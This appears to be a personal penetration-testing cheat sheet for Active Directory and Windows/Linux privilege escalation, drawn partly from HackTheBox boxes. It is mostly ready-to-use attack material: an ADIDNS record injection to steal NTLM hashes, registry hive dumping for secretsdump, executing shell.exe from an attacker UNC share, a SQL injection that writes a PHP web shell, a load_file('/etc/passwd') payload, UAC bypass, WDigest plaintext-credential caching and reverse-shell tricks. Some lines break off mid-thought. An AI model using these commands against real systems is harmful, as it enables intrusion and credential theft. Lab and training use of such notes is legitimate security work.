Always use ffuf for fuzzing files and use gobuster for fuzzing directories
If local privilege escalation exists on windows system for services listening on internal port and exploit is written in python or bash forward that service port and run the exploit in kali.
In active directory environment if we want to pivot to internal windows host from a compromised windows host check if you can receive reverse connection on attacking host on port 53 since AD is usually configured to allow DNS port 53 to communicate to external hosts. eg:
Adding DNS entry in AD environment for stealing ntlm hashes
There is something in Active Directory called ADIDNS(Active Directory INtegrated Dns) where AD users can configure computer account objects which they control to point to an arbitary IP address. Now this feature can be leveraged if an attacker who has compromised a regular domain user adds DNS A record ( also known as Address record which indicates ip address of a given domain ) to point to address where responder is listening and if someone visits the address or some script is setup by IT team to check if all the web sites in the AD are up abd running as in intelligence box from hackthebox as shown below.
��# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves
Ted.Graves@intelligence.htb
' -To 'Ted Graves
Ted.Graves@intelligence.htb
' -Subject "Host: $($record.Name) is down" } } catch {} }
Here an attacker who has a regular domain user compromised can add DNS A record pointing to his ip address where responder is listening and since the above script setup by the IT team checks all dns web domains using Invoke-WebRequest their NTLM hash can be stolen. For this we can use https://github.com/Sagar-Jangam/DNSUpdate
python3 DNSUpdate.py -DNS <DC-IP> -u 'htb.local\<username>' -p <password> -a ad -r webalex -d <attacker-ip>
Enabling PS-Remoting
Having an elavated powershell prompt on victim host we can force powershell to work with winrm.
If we need to transfer binary or executable file via ftp we should always use binary command first then enter put file.exe
If mimikatz doesn't work on the host we can save the sam,system and security hive transfer it to our attacking machine via smb and use secretsdump.py to extract all hashes
reg save hklm\sam c:\windows\temp\sam.save
reg save hklm\security c:\windows\temp\security.save
reg save hklm\system c:\windows\temp\system.save
Windows can execute executable files directly from UNC path
cmd /c \\192.168.119.233\hello\shell.exe
This gets directly executed
To perform tcp port scan On old linux systems where nmap does not run(May need to run more than once to filter good results)
nc -w 1 -zv <ip> 1-65535 2>&1 | grep succeeded
To perform udp port scan on old linux where nmap does not work(May need to run more than once to filter good results)
nc -w 2 -v -u <ip> 1-65535 2>&1 | grep succeeded
Change smb password remotely from linux
smbpasswd -r 10.10.10.193 -U tlavel
Bypass UAC
fodhelper powershell script can be used to bypass UAC only if our compromised user is member of administrator group
Powershell Command History file location
\AppData\Roaming\Microsoft\Windows\Powershell\
If powershell errors during execution of PrivEsc scripts(eg: Access to the path is denied, operation might require other privileges, etc)
check if the running reverse shell is 64 bit process if the host is 64 bit and 32 bit process if the shell is 32 bit process
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
IF host is 64 bit and our process is 32 bit or vice versa make sure to catch the reverse shell via
union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/rev-shell.php'
MySql Injection load_file() read system files
' UNION SELECT NULL,NULL,NULL,load_file('/etc/passwd');--
Wireshark Group
If our compromised user is in (wireshark) group we can sniff any packets on any available interfaces of the comrpomised host. Below we are sniffing on loopback interface and saving the file as test.pcap
[alex@websrv01 ~]$ id
uid1002(alex) gid=1002(alex) groups=1002(alex), 994(wireshark)
[alex@websrv01 ~]$ dumpcap -i lo -w test.pcap
Enabling WDigest authentication to force system to store credentials in plaintext so that next time some employee logs in their creds will get cached in memory
This technique is usually applied to real world red teaming
If we have low privilege access on a windows host and we get credentials or another user or administrator but port 445 is closed externally and we cannot psexec, winrm, rdp or other services are also closed, Enter-PSSession or Invoke-Command -ComputerName didnot work RunasCs or runas.exe also did not work there are another two ways
First Way
We can create a powershell credential object for that user using their password and use Start-Process in powershell with powershell reverse shell to get reverse shell as that user. In compromised host create powershell credential object for that user
We will receive reverse shell as the compromised user.
Second Way
If port 445, winrm, rdp, or any such port from where we can gain access is listening internally we can forward that port to our local machine and execute psexec.py or evil-winrm, or rdp to get reverse shell or access as another user.
